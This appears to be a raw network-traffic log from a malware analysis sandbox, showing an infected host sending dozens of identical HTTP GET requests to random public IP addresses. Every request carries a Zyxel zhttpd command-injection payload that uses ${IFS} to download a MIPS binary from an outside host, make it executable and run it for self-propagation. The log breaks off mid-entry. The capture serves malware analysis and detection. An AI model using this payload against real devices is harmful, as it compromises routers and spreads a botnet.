                                        6309192.168.2.1343786210.147.224.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633176088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6310192.168.2.1359398205.165.124.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633233070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6311192.168.2.1341432208.155.202.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633287907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6312192.168.2.1346624113.118.197.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633312941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6313192.168.2.135322250.180.57.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633316994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6314192.168.2.134913674.120.128.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633373976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6315192.168.2.135782673.127.86.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633411884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6316192.168.2.1348412142.98.2.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633436918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6317192.168.2.1341428154.115.32.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633466959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6318192.168.2.1334588212.71.7.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633513927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6319192.168.2.133379262.145.69.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633547068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6320192.168.2.1343712105.3.42.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633582115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6321192.168.2.1358270175.145.207.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633606911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6322192.168.2.1345034153.158.239.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633651972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6323192.168.2.1353402208.118.203.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633706093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6324192.168.2.1351566147.205.120.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633722067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6325192.168.2.134192887.213.211.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633749008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6326192.168.2.133423062.178.222.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633800983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6327192.168.2.134539270.225.93.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633861065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6328192.168.2.1354664123.160.1.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633928061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6329192.168.2.1340248118.195.39.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633948088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6330192.168.2.1355218207.90.144.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633977890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6331192.168.2.134288864.4.49.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634027004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6332192.168.2.1339910203.131.126.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634063005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6333192.168.2.134808485.152.47.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634104967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6334192.168.2.1340330221.176.47.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634133101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6335192.168.2.1350088155.142.139.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634160995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6336192.168.2.1358178173.114.160.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634213924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6337192.168.2.1349692104.183.192.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634257078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6338192.168.2.134193851.19.105.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634280920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6339192.168.2.134622041.232.38.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634341002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6340192.168.2.1339834115.131.225.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634371042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6341192.168.2.133826249.238.57.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634412050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6342192.168.2.1333588210.248.168.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634479046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6343192.168.2.1359076102.159.230.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634485960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6344192.168.2.1342920212.254.245.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634552956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6345192.168.2.1351828137.190.162.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634588003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6346192.168.2.1349860143.19.17.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634628057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6347192.168.2.1337426189.254.154.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634671926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6348192.168.2.1353794121.219.112.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634707928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6349192.168.2.1336056156.52.19.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634730101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6350192.168.2.1334876111.190.218.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634788036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6351192.168.2.134516631.237.37.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634814024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6352192.168.2.1333416193.145.72.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634872913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6353192.168.2.1354616191.56.186.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634931087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6354192.168.2.1338174143.138.251.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.634963989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6355192.168.2.1354750117.44.184.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635016918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6356192.168.2.1343758164.224.182.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635040045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6357192.168.2.1348904136.27.119.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635087967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6358192.168.2.133314296.144.4.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635130882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6359192.168.2.1353682169.193.204.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635184050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6360192.168.2.135432434.227.63.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635215998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6361192.168.2.135258242.27.71.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635247946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6362192.168.2.1353394124.87.177.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635272980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6363192.168.2.1354348178.110.44.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635307074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6364192.168.2.1338860165.154.183.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635345936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6365192.168.2.135676842.0.210.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635390043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6366192.168.2.134212642.188.226.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635417938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6367192.168.2.134394047.229.5.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635473013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6368192.168.2.1341208213.112.45.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635514975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6369192.168.2.1357366152.151.32.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635555983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6370192.168.2.1336930157.243.153.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635582924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6371192.168.2.1339514108.106.1.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635634899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6372192.168.2.135845284.103.125.191443
                                        TimestampBytes transferredDirectionData
